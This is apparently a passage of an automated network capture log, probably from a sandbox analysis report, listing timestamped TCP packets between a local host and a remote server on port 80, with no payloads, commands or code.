                                                                                                                                                                                Dec 30, 2024 19:45:49.675416946 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675426960 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675430059 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675441980 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675451994 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675462961 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675461054 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675489902 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675489902 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675501108 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675510883 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675522089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675525904 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675538063 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675538063 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675550938 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675558090 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675596952 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675654888 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675666094 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675677061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675687075 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675700903 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675707102 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675714970 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675721884 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675734997 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675745964 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675749063 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675759077 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675769091 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675781965 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675791025 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675792933 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675806046 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675810099 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675817966 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675828934 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675833941 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675844908 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675854921 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675856113 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675878048 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675893068 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675919056 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773529053 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773544073 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773588896 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773601055 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773611069 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773612976 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773627996 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773638964 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773649931 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773659945 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773660898 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773684025 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773703098 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773758888 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773767948 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773808956 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773819923 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773864031 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773880005 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773890018 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773901939 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773931980 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.773983955 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.773996115 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774005890 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774017096 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774027109 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774029970 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774066925 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774211884 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774230003 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774240017 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774286985 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774312019 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774358034 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774388075 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774399042 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774410009 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774420977 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774431944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774441004 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774461985 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774471998 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774478912 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774504900 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774507999 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774518967 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774566889 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774570942 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774583101 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774594069 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774621010 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774636030 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774646997 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774666071 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774676085 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774718046 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774859905 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774878025 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774888039 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774919033 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774938107 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.774945021 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774954081 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774960995 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.774971008 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775001049 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775012016 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775137901 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775151014 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775167942 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775182962 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775186062 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775196075 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775206089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775216103 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775237083 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775264978 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775289059 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775302887 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775319099 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775330067 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775342941 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775353909 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775372028 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775382042 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775392056 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775403023 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775420904 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775453091 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775552988 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775572062 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775602102 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775634050 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775645971 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775657892 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775671959 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775681019 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775686026 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775717974 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775747061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775758982 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775768995 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775815010 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775887012 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775897026 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775907993 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775917053 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.775938988 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.775950909 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883503914 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883526087 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883537054 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883548021 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883559942 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883572102 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883588076 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883589983 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883598089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883619070 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883641005 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883728981 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883742094 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883752108 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883785963 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883810043 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883822918 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883832932 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883860111 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883889914 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.883902073 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883913994 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883924961 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.883954048 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884001970 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884011984 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884047031 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884109020 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884118080 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884134054 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884146929 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884156942 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884167910 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884191036 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884222984 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884289026 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884306908 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884319067 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884330988 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884349108 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884350061 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884366035 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884377956 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884387970 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884411097 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884493113 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884504080 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884515047 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884525061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884553909 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884567976 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884620905 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884630919 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884676933 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884685993 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884686947 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884702921 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884730101 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884752035 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884754896 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884767056 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884802103 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884849072 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884860992 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884871006 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.884905100 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.884999037 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885016918 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885030031 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885040998 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885041952 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885051966 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885065079 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885102987 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885149002 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885159016 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885169983 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885175943 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885224104 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885268927 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885279894 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885335922 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885396004 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885406017 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885416031 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885426998 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885447979 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885478973 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885478973 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885492086 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885503054 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885529041 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885549068 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885561943 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885591030 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885708094 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885716915 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885726929 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885737896 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885749102 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885799885 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885812998 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885842085 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885855913 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885865927 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.885890007 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.885909081 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993311882 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993376017 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993386030 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993396044 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993407965 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993418932 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993431091 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993434906 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993441105 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993458033 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993474960 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993509054 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993520021 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993530035 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993546963 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993557930 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993568897 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993583918 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993711948 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993722916 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993757963 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993789911 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993799925 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993812084 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993838072 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993868113 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993868113 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993877888 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993885040 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993895054 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.993930101 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.993937969 CET8050071101.99.94.162192.168.2.4
